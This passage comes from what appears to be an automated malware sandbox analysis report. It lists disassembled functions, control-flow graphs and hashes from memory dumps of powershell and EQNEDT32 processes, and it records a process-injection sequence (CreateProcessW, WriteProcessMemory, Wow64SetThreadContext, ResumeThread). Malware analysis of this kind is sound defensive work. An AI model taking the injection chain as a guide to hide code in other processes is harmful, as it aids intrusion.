                                                                        • Instruction Fuzzy Hash: 8541521102E3C25EE747A77618661D13FB25D67280BDE65EBC4C09FAA7E00A098ED372
                                                                        Function 0032CCEB Relevance: .3, Instructions: 283COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 200 32cceb-32cf5f
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21097b48ea6a4fa46c64eb90921ad70dcee2edd695a2c694d7ed9c949ab04541
                                                                        • Instruction ID: b8b98d02aac9552d611192c5ea61a9005332a9f8d47177cf53f490a588b8129b
                                                                        • Opcode Fuzzy Hash: 21097b48ea6a4fa46c64eb90921ad70dcee2edd695a2c694d7ed9c949ab04541
                                                                        • Instruction Fuzzy Hash: B371EA9549E3D11FD74383B4682E9A1BFA12A5712174FD2DFD4C99E9B3E3888806D322
                                                                        Function 0032AD79 Relevance: .1, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp, Offset: 0031E000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_31e000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfea9ae4210891935b2ce8b423cfb3105e3ac4bad8b86d02603c2707dedfd0c1
                                                                        • Instruction ID: 2709fcc6afe3152214532dc976874c26453f82e534890fb4e56a2839a869d33b
                                                                        • Opcode Fuzzy Hash: dfea9ae4210891935b2ce8b423cfb3105e3ac4bad8b86d02603c2707dedfd0c1
                                                                        • Instruction Fuzzy Hash: 6B5129A144E7D0AFEB03577808762A67FB08E57290B0E29CBC4D1CF0B3E008591AE323

                                                                        Executed Functions

                                                                        Function 001ED01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.515392859.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1ed000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c33c933a9e53b7e4bd2a4b3d8f13627f5f8b55e0a17e4bd1bb81edd932bf87c4
                                                                        • Instruction ID: 0d899b4254ef2907703a2695b2e9d0455626b33bb7b33db2a9730224cae98089
                                                                        • Opcode Fuzzy Hash: c33c933a9e53b7e4bd2a4b3d8f13627f5f8b55e0a17e4bd1bb81edd932bf87c4
                                                                        • Instruction Fuzzy Hash: 7801DF70104780EAE7248A26E884B6ABB98DF81764F2CC41AEC590B286C3799941CAB1
                                                                        Function 001ED006 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.515392859.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1ed000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3a822ed6141203bc0d65c5579195ec64e1bcbfbd2b4a62199ce06f493995363
                                                                        • Instruction ID: 98cebd529b1fc3613cefeece696b419aa4073959a3b273c3d71a134953ae6ae6
                                                                        • Opcode Fuzzy Hash: f3a822ed6141203bc0d65c5579195ec64e1bcbfbd2b4a62199ce06f493995363
                                                                        • Instruction Fuzzy Hash: 7D014C7100E3C09FE7128B259C94B56BFB4DF43624F1D81DBE8888F1A7C2695848C772

                                                                        Execution Graph

                                                                        Execution Coverage:11.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:46
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 4243 1f4b40 4244 1f4b67 4243->4244 4247 1f4c90 4244->4247 4248 1f4cba 4247->4248 4249 1f4c7c 4248->4249 4252 1f4d58 4248->4252 4268 1f4d48 4248->4268 4254 1f4d8b 4252->4254 4284 1f172c 4254->4284 4255 1f4f54 4256 1f1738 Wow64SetThreadContext 4255->4256 4257 1f5053 4255->4257 4256->4257 4258 1f1774 WriteProcessMemory 4257->4258 4262 1f537c 4258->4262 4259 1f561b 4260 1f1774 WriteProcessMemory 4259->4260 4261 1f566c 4260->4261 4263 1f1780 Wow64SetThreadContext 4261->4263 4264 1f576f 4261->4264 4262->4259 4265 1f1774 WriteProcessMemory 4262->4265 4263->4264 4266 1f1798 ResumeThread 4264->4266 4265->4262 4267 1f5821 4266->4267 4267->4248 4270 1f4d58 4268->4270 4269 1f172c CreateProcessW 4271 1f4f54 4269->4271 4270->4269 4273 1f5053 4271->4273 4299 1f1738 4271->4299 4288 1f1774 4273->4288 4275 1f537c 4276 1f561b 4275->4276 4281 1f1774 WriteProcessMemory 4275->4281 4277 1f1774 WriteProcessMemory 4276->4277 4278 1f566c 4277->4278 4280 1f576f 4278->4280 4292 1f1780 4278->4292 4296 1f1798 4280->4296 4281->4275 4285 1f5930 CreateProcessW 4284->4285 4287 1f5b24 4285->4287 4287->4287 4289 1f5f98 WriteProcessMemory 4288->4289 4291 1f6078 4289->4291 4291->4275 4293 1f5c68 Wow64SetThreadContext 4292->4293 4295 1f5d24 4293->4295 4295->4280 4297 1f60d8 ResumeThread 4296->4297 4298 1f5821 4297->4298 4298->4248 4301 1f5c68 Wow64SetThreadContext 4299->4301 4302 1f5d24 4301->4302 4302->4273

                                                                        Executed Functions

                                                                        Function 0035203C Relevance: 6.3, Strings: 4, Instructions: 1320COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 35203c-35203f 1 352045-35204d 0->1 2 352041-352043 0->2 3 352065-352069 1->3 4 35204f-352054 1->4 2->1 7 352194-35219e 3->7 8 35206f-352073 3->8 5 352055 4->5 6 352059-352063 4->6 5->6 9 352057 5->9 6->3 10 3521a0-3521a9 7->10 11 3521ac-3521b2 7->11 12 352075-352086 8->12 13 3520b3 8->13 9->3 16 3521b4-3521b6 11->16 17 3521b8-3521c4 11->17 22 3521ec-35223b 12->22 23 35208c-352091 12->23 14 3520b5-3520b7 13->14 14->7 18 3520bd-3520c1 14->18 20 3521c6-3521e9 16->20 17->20 18->7 21 3520c7-3520cb 18->21 21->7 25 3520d1-3520f7 21->25 33 352241-352246 22->33 34 35243e-35244d 22->34 26 352093-352099 23->26 27 3520a9-3520b1 23->27 25->7 45 3520fd-352101 25->45 30 35209d-3520a7 26->30 31 35209b 26->31 27->14 30->27 31->27 36 35225e-352262 33->36 37 352248-35224e 33->37 42 3523e7-3523f1 36->42 43 352268-35226a 36->43 39 352250 37->39 40 352252-35225c 37->40 39->36 40->36 48 3523f3-3523fa 42->48 49 3523fd-352403 42->49 46 35226c-352278 43->46 47 35227a 43->47 53 352124 45->53 54 352103-35210c 45->54 55 35227c-35227e 46->55 47->55 50 352405-352407 49->50 51 352409-352415 49->51 57 352417-35243b 50->57 51->57 58 352127-352134 53->58 59 352113-352120 54->59 60 35210e-352111 54->60 55->42 56 352284-3522a3 55->56 70 3522a5-3522b1 56->70 71 3522b3 56->71 64 35213a-352191 58->64 62 352122 59->62 60->62 62->58 72 3522b5-3522b7 70->72 71->72 72->42 73 3522bd-3522c1 72->73 73->42 74 3522c7-3522cb 73->74 75 3522cd-3522dc 74->75 76 3522de 74->76 77 3522e0-3522e2 75->77 76->77 77->42 78 3522e8-3522ec 77->78 78->42 79 3522f2-352311 78->79 82 352313-352319 79->82 83 352329-352334 79->83 84 35231d-35231f 82->84 85 35231b 82->85 86 352336-352339 83->86 87 352343-35235f 83->87 84->83 85->83 86->87 88 352361-352374 87->88 89 35237c-352386 87->89 88->89 90 352388 89->90 91 35238a-3523d8 89->91 92 3523dd-3523e4 90->92 91->92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L4#p$L4#p$L4#p$d=,
                                                                        • API String ID: 0-59673657
                                                                        • Opcode ID: 63d67c2bf6371f378544a2d26dccf60db4321041b5001db2a8963d1dfa94149d
                                                                        • Instruction ID: 0756532dbf222e01e3ce330d15c7e6370fb4512932ab5c0da7729724a273c077
                                                                        • Opcode Fuzzy Hash: 63d67c2bf6371f378544a2d26dccf60db4321041b5001db2a8963d1dfa94149d
                                                                        • Instruction Fuzzy Hash: EAB1F535700244DFDF269F64C840FAF7BA2AF86312F15846AED058B2A1DB75CD89CB91
                                                                        Function 00350B98 Relevance: 5.5, Strings: 4, Instructions: 476COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 99 350b98-350bbb 100 350d96-350ddb 99->100 101 350bc1-350bc6 99->101 109 350de1-350de6 100->109 110 350f32-350f7e 100->110 102 350bde-350be2 101->102 103 350bc8-350bce 101->103 107 350d43-350d4d 102->107 108 350be8-350bec 102->108 105 350bd0 103->105 106 350bd2-350bdc 103->106 105->102 106->102 111 350d4f-350d58 107->111 112 350d5b-350d61 107->112 113 350bff 108->113 114 350bee-350bfd 108->114 115 350dfe-350e02 109->115 116 350de8-350dee 109->116 133 350f84-350f89 110->133 134 3510eb-351109 110->134 118 350d67-350d73 112->118 119 350d63-350d65 112->119 120 350c01-350c03 113->120 114->120 124 350edf-350ee9 115->124 125 350e08-350e0a 115->125 121 350df0 116->121 122 350df2-350dfc 116->122 123 350d75-350d93 118->123 119->123 120->107 126 350c09-350c29 120->126 121->115 122->115 128 350ef7-350efd 124->128 129 350eeb-350ef4 124->129 131 350e0c-350e18 125->131 132 350e1a 125->132 169 350c48 126->169 170 350c2b-350c46 126->170 135 350f03-350f0f 128->135 136 350eff-350f01 128->136 138 350e1c-350e1e 131->138 132->138 141 350fa1-350fa5 133->141 142 350f8b-350f91 133->142 159 35111b-35111d 134->159 160 35110b-351118 134->160 145 350f11-350f2f 135->145 136->145 138->124 148 350e24-350e28 138->148 146 350fab-350fad 141->146 147 35109a-3510a4 141->147 143 350f95-350f9f 142->143 144 350f93 142->144 143->141 144->141 153 350fbd 146->153 154 350faf-350fbb 146->154 150 3510a6-3510af 147->150 151 3510b2-3510b8 147->151 155 350e48 148->155 156 350e2a-350e46 148->156 161 3510be-3510ca 151->161 162 3510ba-3510bc 151->162 165 350fbf-350fc1 153->165 154->165 164 350e4a-350e4c 155->164 156->164 166 35112d 159->166 167 35111f-35112b 159->167 160->159 172 3510cc-3510e8 161->172 162->172 164->124 173 350e52-350e65 164->173 165->147 175 350fc7-350fc9 165->175 171 35112f-351131 166->171 167->171 174 350c4a-350c4c 169->174 170->174 182 351133-351139 171->182 183 35117d-351187 171->183 200 350e6b-350e6d 173->200 174->107 179 350c52-350c54 174->179 180 350fd9 175->180 181 350fcb-350fd7 175->181 189 350c64 179->189 190 350c56-350c62 179->190 194 350fdb-350fdd 180->194 181->194 192 351147-351164 182->192 193 35113b-35113d 182->193 186 351192-351198 183->186 187 351189-35118f 183->187 198 35119e-3511aa 186->198 199 35119a-35119c 186->199 196 350c66-350c68 189->196 190->196 214 351166-351177 192->214 215 3511ca-3511cf 192->215 193->192 194->147 197 350fe3-350fe5 194->197 196->107 201 350c6e-350c8e 196->201 204 350fe7-350fed 197->204 205 350fff-351003 197->205 206 3511ac-3511c7 198->206 199->206 208 350e85-350edc 200->208 209 350e6f-350e75 200->209 229 350ca6-350caa 201->229 230 350c90-350c96 201->230 210 350ff1-350ffd 204->210 211 350fef 204->211 212 351005-35100b 205->212 213 35101d-351097 205->213 219 350e77 209->219 220 350e79-350e7b 209->220 210->205 211->205 217 35100d 212->217 218 35100f-35101b 212->218 214->183 215->214 217->213 218->213 219->208 220->208 234 350cc4-350cc8 229->234 235 350cac-350cb2 229->235 232 350c98 230->232 233 350c9a-350c9c 230->233 232->229 233->229 239 350ccf-350cd1 234->239 237 350cb4 235->237 238 350cb6-350cc2 235->238 237->234 238->234 241 350cd3-350cd9 239->241 242 350ce9-350d40 239->242 244 350cdd-350cdf 241->244 245 350cdb 241->245 244->242 245->242
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8#f$8#f$l;,$l;,
                                                                        • API String ID: 0-1656524266
                                                                        • Opcode ID: 3c90f6a0ef55a32e8bf59bed040914631f01486464d1d021464743e907c40837
                                                                        • Instruction ID: 5129198256acded9d490d83e20982755efd1f69fc3abff4a99a4b1f1f58ebb81
                                                                        • Opcode Fuzzy Hash: 3c90f6a0ef55a32e8bf59bed040914631f01486464d1d021464743e907c40837
                                                                        • Instruction Fuzzy Hash: 9FF15531B00301CFDB2A9A68C850B6AB7F5AFD1312F25847ADC59DB2A1DB72CD49C761
                                                                        Function 001F172C Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 246 1f172c-1f59bb 248 1f59bd-1f59cf 246->248 249 1f59d2-1f59e0 246->249 248->249 250 1f59f7-1f5a33 249->250 251 1f59e2-1f59f4 249->251 252 1f5a47-1f5b22 CreateProcessW 250->252 253 1f5a35-1f5a44 250->253 251->250 257 1f5b2b-1f5bf4 252->257 258 1f5b24-1f5b2a 252->258 253->252 267 1f5c2a-1f5c35 257->267 268 1f5bf6-1f5c1f 257->268 258->257 272 1f5c36 267->272 268->267 272->272
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F5B0F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e430ba4fb794dc1a12b95206bb7a582ac528f58111ce15dc75ae3bd59c92672e
                                                                        • Instruction ID: 5db63cddd77f10c6f97c1582523b31e11f99ffd40d220973601441c83445fee4
                                                                        • Opcode Fuzzy Hash: e430ba4fb794dc1a12b95206bb7a582ac528f58111ce15dc75ae3bd59c92672e
                                                                        • Instruction Fuzzy Hash: 3881CFB4D0026DDFDB25CFA4C880BEDBBB1AB49304F1490AAE649B7210D7749A85CF94
                                                                        Function 001F592E Relevance: 1.7, APIs: 1, Instructions: 237processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 273 1f592e-1f59bb 275 1f59bd-1f59cf 273->275 276 1f59d2-1f59e0 273->276 275->276 277 1f59f7-1f5a33 276->277 278 1f59e2-1f59f4 276->278 279 1f5a47-1f5b22 CreateProcessW 277->279 280 1f5a35-1f5a44 277->280 278->277 284 1f5b2b-1f5bf4 279->284 285 1f5b24-1f5b2a 279->285 280->279 294 1f5c2a-1f5c35 284->294 295 1f5bf6-1f5c1f 284->295 285->284 299 1f5c36 294->299 295->294 299->299
                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001F5B0F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: e07ffbce9387bf1245a9e1afcc08cec501ab15cf94df339bd31d2b11d580ebeb
                                                                        • Instruction ID: 4a6615c8974743c9cb2267227518ce035f2f14973f8eaefed8e5ba5a6482d06a
                                                                        • Opcode Fuzzy Hash: e07ffbce9387bf1245a9e1afcc08cec501ab15cf94df339bd31d2b11d580ebeb
                                                                        • Instruction Fuzzy Hash: 9681C0B4D0026DDFDF25CFA4C880BEDBBB1AB49304F1490AAE649B7250D7749A85CF94
                                                                        Function 001F1774 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 300 1f1774-1f5fff 302 1f6016-1f6076 WriteProcessMemory 300->302 303 1f6001-1f6013 300->303 304 1f607f-1f60bd 302->304 305 1f6078-1f607e 302->305 303->302 305->304
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F6066
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 0b0c38d8b34ca0598546110aa874f65bb8fbb1a3f022918e6c460c405db4bcf7
                                                                        • Instruction ID: ff0bce298b7c27a08c5be295e1ee02cb79e58ad1102e3070c2dba4dac8ab6af1
                                                                        • Opcode Fuzzy Hash: 0b0c38d8b34ca0598546110aa874f65bb8fbb1a3f022918e6c460c405db4bcf7
                                                                        • Instruction Fuzzy Hash: 384189B5D14258DFCF10CFA9D984AEEFBF1BB49310F24902AE918B7210D375AA45CB64
                                                                        Function 001F5F91 Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 308 1f5f91-1f5fff 309 1f6016-1f6076 WriteProcessMemory 308->309 310 1f6001-1f6013 308->310 311 1f607f-1f60bd 309->311 312 1f6078-1f607e 309->312 310->309 312->311
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001F6066
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: e3a1e85781adb3e210b680a3297468c2318a236e1b4a723aacbf1509a60b1f9f
                                                                        • Instruction ID: 9d3363e9460c6763e3afb88b04857f6090faa47e87ffa738176d7f57cc75f094
                                                                        • Opcode Fuzzy Hash: e3a1e85781adb3e210b680a3297468c2318a236e1b4a723aacbf1509a60b1f9f
                                                                        • Instruction Fuzzy Hash: 40418AB5D00258DFCF00CFA9D984AEEFBF1BB49310F24902AE918B7210D375AA45CB64
                                                                        Function 001F5C61 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 331 1f5c61-1f5cc4 333 1f5cdb-1f5d22 Wow64SetThreadContext 331->333 334 1f5cc6-1f5cd8 331->334 335 1f5d2b-1f5d63 333->335 336 1f5d24-1f5d2a 333->336 334->333 336->335
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: c8dcb18be1f50f2d685e66059b1f8f54cce636b5a73d420e34fdccdc77905c87
                                                                        • Instruction ID: 1e68a413fb3e8db23ae72935fb78d66a85fbe1093ccf6f7ecbf6bcfaca5db48c
                                                                        • Opcode Fuzzy Hash: c8dcb18be1f50f2d685e66059b1f8f54cce636b5a73d420e34fdccdc77905c87
                                                                        • Instruction Fuzzy Hash: D931AAB5D012589FDB10CFAAD984AEEFBF1BB49314F24802AE514B7310D378AA45CF64
                                                                        Function 001F1738 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 315 1f1738-1f5cc4 317 1f5cdb-1f5d22 Wow64SetThreadContext 315->317 318 1f5cc6-1f5cd8 315->318 319 1f5d2b-1f5d63 317->319 320 1f5d24-1f5d2a 317->320 318->317 320->319
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 850ede4bfb59aa7ce206f40e91cfd5ec599b24b8f47b2a6db51d5f5fe6a56d4f
                                                                        • Instruction ID: 99d77beff4454b18cf63bfc5512532fd4fcb53e97b97d7071689a332856ecdd4
                                                                        • Opcode Fuzzy Hash: 850ede4bfb59aa7ce206f40e91cfd5ec599b24b8f47b2a6db51d5f5fe6a56d4f
                                                                        • Instruction Fuzzy Hash: 24319BB5D052589FCB10CFA9D984AEEFBF1BB49314F24802AE519B7310D374AA45CF64
                                                                        Function 001F1780 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 323 1f1780-1f5cc4 325 1f5cdb-1f5d22 Wow64SetThreadContext 323->325 326 1f5cc6-1f5cd8 323->326 327 1f5d2b-1f5d63 325->327 328 1f5d24-1f5d2a 325->328 326->325 328->327
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001F5D12
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 7b6c6cd8728f7d810af39adb4b452f5e471e90563ed6911cf91c3638286106c0
                                                                        • Instruction ID: 2a5e1eb470cd6f31b99aee2b7fc299a73de47ac6aebf381062c41f63bc2bbd1a
                                                                        • Opcode Fuzzy Hash: 7b6c6cd8728f7d810af39adb4b452f5e471e90563ed6911cf91c3638286106c0
                                                                        • Instruction Fuzzy Hash: D0319BB5D052589FCB10CFA9D984AEEFBF1BB49314F24802AE519B7310D374AA45CFA4
                                                                        Function 001F60D0 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 339 1f60d0-1f615e ResumeThread 341 1f6167-1f6195 339->341 342 1f6160-1f6166 339->342 342->341
                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 001F614E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: f0b1b0cfc6607658614e03c4719ce23d73dfd00bb85025747e77cb48ec151d45
                                                                        • Instruction ID: 0607955ee9cd3ef5f12c08c0895436bd4887e2f0c14c68dac3410cbcfeafab0e
                                                                        • Opcode Fuzzy Hash: f0b1b0cfc6607658614e03c4719ce23d73dfd00bb85025747e77cb48ec151d45
                                                                        • Instruction Fuzzy Hash: 5F21AAB9D042089FDB10CFA9D984ADEFBF4AB49314F24901AE918B7310C374A945CFA5
                                                                        Function 001F1798 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 345 1f1798-1f615e ResumeThread 347 1f6167-1f6195 345->347 348 1f6160-1f6166 345->348 348->347
                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 001F614E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510144331.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: d797d1c06d8c89210c9411eedfd3da97d44dad26abfba2caaddbce9ae5837826
                                                                        • Instruction ID: 99de71c192073504b34c3ea3430fd2c5a986e6fb5b25bd6d2428b6608661ea47
                                                                        • Opcode Fuzzy Hash: d797d1c06d8c89210c9411eedfd3da97d44dad26abfba2caaddbce9ae5837826
                                                                        • Instruction Fuzzy Hash: 6E218CB4D042589FCB10CFA9D984AEEFBF4AB49314F24906AE918B7310D375A945CFA4
                                                                        Function 00351730 Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 684 351730-351733 685 351735-351737 684->685 686 351739-351741 684->686 685->686 687 351743-351748 686->687 688 351759-35175d 686->688 689 35174d-351757 687->689 690 351749 687->690 691 351763-351765 688->691 692 35188e-351898 688->692 689->688 690->689 693 35174b 690->693 694 351775 691->694 695 351767-351773 691->695 696 3518a6-3518ac 692->696 697 35189a-3518a3 692->697 693->688 699 351777-351779 694->699 695->699 700 3518b2-3518be 696->700 701 3518ae-3518b0 696->701 699->692 702 35177f-351783 699->702 703 3518c0-3518df 700->703 701->703 704 351785-351794 702->704 705 351796 702->705 708 351798-35179a 704->708 705->708 708->692 709 3517a0-3517a2 708->709 710 3517a4-3517b0 709->710 711 3517b2 709->711 713 3517b4-3517b6 710->713 711->713 713->692 714 3517bc-3517be 713->714 715 3517c0-3517c6 714->715 716 3517d8-3517e3 714->716 717 3517c8 715->717 718 3517ca-3517d6 715->718 719 3517e5-3517e8 716->719 720 3517f2-3517fe 716->720 717->716 718->716 719->720 721 351800-351802 720->721 722 35180c-351813 720->722 721->722 724 35181a-35181c 722->724 725 351834-35188b 724->725 726 35181e-351824 724->726 727 351826 726->727 728 351828-35182a 726->728 727->725 728->725
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510221363.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_350000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa32ce2301ea289eb8108552225d78cef8f0ba81d739a5260d9d0e1d2f5f48f7
                                                                        • Instruction ID: 5f5c06e01df14110fba536aff9ff8b3687c380bdf5a45111c3b8eeb4f122343e
                                                                        • Opcode Fuzzy Hash: fa32ce2301ea289eb8108552225d78cef8f0ba81d739a5260d9d0e1d2f5f48f7
                                                                        • Instruction Fuzzy Hash: E9410636700201DBDB3B4E28D400BBAB7A5AF95313B2985BADC558B271DBB4CD49C751
                                                                        Function 0015D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510105680.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df4e3a83ea8a3c786d514c25c46520c294658363d16c38028515e7b32cd8adf4
